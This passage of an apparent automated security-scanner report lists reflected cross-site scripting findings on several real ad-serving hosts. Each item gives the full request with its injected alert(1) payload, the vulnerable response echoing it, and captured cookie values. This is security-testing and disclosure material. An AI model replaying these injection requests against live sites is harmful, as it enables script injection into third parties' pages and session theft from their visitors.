Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235c3700"><script>alert(1)</script>c1d53990b82/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.64. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aafad"><script>alert(1)</script>58e3214e0d4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606aafad"><script>alert(1)</script>58e3214e0d4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606aafad"><script>alert(1)</script>58e3214e0d4/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.65. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64130"><script>alert(1)</script>4aff41005f7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/064130"><script>alert(1)</script>4aff41005f7/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/064130"><script>alert(1)</script>4aff41005f7/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.66. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86bda"><script>alert(1)</script>f0041c3072b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/15486bda"><script>alert(1)</script>f0041c3072b/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/15486bda"><script>alert(1)</script>f0041c3072b/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.67. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd55"><script>alert(1)</script>94b70172a07 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH9fd55"><script>alert(1)</script>94b70172a07;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH9fd55"><script>alert(1)</script>94b70172a07;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001;adiframe=y">
...[SNIP]...

1.68. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [cookie parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The value of the cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c48c"><script>alert(1)</script>9172a92def1 was submitted in the cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=0000019c48c"><script>alert(1)</script>9172a92def1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 294

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=0000019c48c"><script>alert(1)</script>9172a92def1;adiframe=y">
...[SNIP]...

1.69. http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5235/1131606/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd538"><script>alert(1)</script>254bcc5e869 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&fd538"><script>alert(1)</script>254bcc5e869=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://drudgereport.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude; bk_lt_autogen=bk_lt_autogen; 1=ADC72FAB.153503.1.11445B.7.0.4D5883E8.15FB07.A75CE1.1473.1

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 297

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001&fd538"><script>alert(1)</script>254bcc5e869=1;adiframe=y">
...[SNIP]...

1.70. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30ced"-alert(1)-"bb2604ed03b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=ad&ad_size=728x90&section=967562&30ced"-alert(1)-"bb2604ed03b=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/216/us/728x90/news?t=1297647385452&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.independent.co.uk%2Fnews%2Fworld%2Fafrica%2Fis-the-army-tightening-its-grip-on-egypt-2213849.html&refer=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:35 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 14 Feb 2011 01:37:35 GMT
Pragma: no-cache
Content-Length: 4332
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?30ced"-alert(1)-"bb2604ed03b=1&Z=728x90&s=967562&_salt=1387362591";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Arr
...[SNIP]...

1.71. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3685f'-alert(1)-'4d88b1eaae was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-4?mpt=21704443685f'-alert(1)-'4d88b1eaae&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 462
Date: Mon, 14 Feb 2011 01:38:23 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=21704443685f'-alert(1)-'4d88b1eaae">
...[SNIP]...

1.72. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 707c4'%3balert(1)//6d6a9985586 was submitted in the mpvc parameter. This input was echoed as 707c4';alert(1)//6d6a9985586 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-4?mpt=2170444&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f707c4'%3balert(1)//6d6a9985586 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 463
Date: Mon, 14 Feb 2011 01:38:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?707c4';alert(1)//6d6a9985586http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=2170444">
...[SNIP]...

1.73. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58cba'%3balert(1)//d36ec453a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 58cba';alert(1)//d36ec453a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-4?mpt=2170444&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f&58cba'%3balert(1)//d36ec453a8=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 465
Date: Mon, 14 Feb 2011 01:38:27 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?&58cba';alert(1)//d36ec453a8=1http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=2170444">
...[SNIP]...

1.74. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbeaf'-alert(1)-'9307f7dd42 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694bbeaf'-alert(1)-'9307f7dd42&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 457
Date: Mon, 14 Feb 2011 01:37:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694bbeaf'-alert(1)-'9307f7dd42">
...[SNIP]...

1.75. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 712dc'%3balert(1)//23d3264674b was submitted in the mpvc parameter. This input was echoed as 712dc';alert(1)//23d3264674b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f712dc'%3balert(1)//23d3264674b HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 455
Date: Mon, 14 Feb 2011 01:37:42 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?712dc';alert(1)//23d3264674bhttp://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694">
...[SNIP]...

1.76. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4bde'%3balert(1)//6d86e68f733 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4bde';alert(1)//6d86e68f733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f&f4bde'%3balert(1)//6d86e68f733=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
